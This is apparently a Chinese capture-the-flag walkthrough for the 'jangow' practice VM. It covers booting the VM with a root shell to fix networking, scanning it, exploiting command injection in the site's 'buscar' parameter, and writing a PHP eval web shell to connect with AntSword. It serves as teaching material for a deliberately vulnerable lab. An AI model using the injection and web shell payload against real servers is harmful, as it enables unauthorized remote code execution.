当前位置: 首页 > article >正文

jangow靶机攻略

配置网卡

VMware需要配置,不配置扫不到ip,VirtualBox正常打开ip会直接显示出来

网卡配置都改成NAT

打开虚拟机,第一个框选第二行,回车

选第二个,按e键 

进入下一个框后,将ro 后面的修改为= rw signin init=/bin/bash

按ctrl+x ,进入命令界面 

cd etc

cd network

ls

vim interfaces

 进入文件后,把网卡改成ens33

之后重启,无脑回车就能

 开始攻略

扫描ip

arp-scan -l

 扫描端口

nmap -sV 

 访问80端口

点击site

各个功能点都试了之后,发现在右上角的buscar点击之后网页上会有参数

输入whoami,发现有回显,说明存在漏洞

输入一句话木马

echo '<?php eval($_POST["cmd"]);'  > 1.php

访问发现成功写入 

 尝试使用蚁剑连接


http://www.kler.cn/a/599280.html

相关文章:

  • Jenkins 集成 SonarQube 代码静态检查使用说明
  • 内网(域)渗透测试流程和模拟测试day--2--漏洞利用getshell
  • 同一个局域网的话 如何访问另一台电脑的ip
  • 检波、限幅、钳位电路
  • 【深度学习】【目标检测】【OnnxRuntime】【C++】YOLOV3模型部署
  • 模版的特化引发的权限扩大的解决方法
  • 基于51单片机的双机通信温度检测报警系统的仿真设计
  • 腾讯云大模型知识引擎×DeepSeek | 企业应用快速接入手册
  • LVS-DR模式配置脚本
  • 5.4 位运算专题:LeetCode 137. 只出现一次的数字 II
  • 模糊推理规则生成方法详解
  • CentOS8 安装 Docker-CE
  • FPGA中串行执行方式之流水线(Pipeline)
  • Spring MVC配置详解:从历史到实战
  • Node.js系列(6)--安全实践指南
  • 基于PySide6与pycatia的CATIA绘图文本批量处理工具开发实践
  • 永久禁用 firewalld: systemctl disable firewalld
  • C++类与对象的第二个简单的实战练习-3.24笔记
  • MobaXterm配置ssh端口转发autodl服务器网页页面
  • UNIX网络编程笔记:TCP、UDP、SCTP编程的区别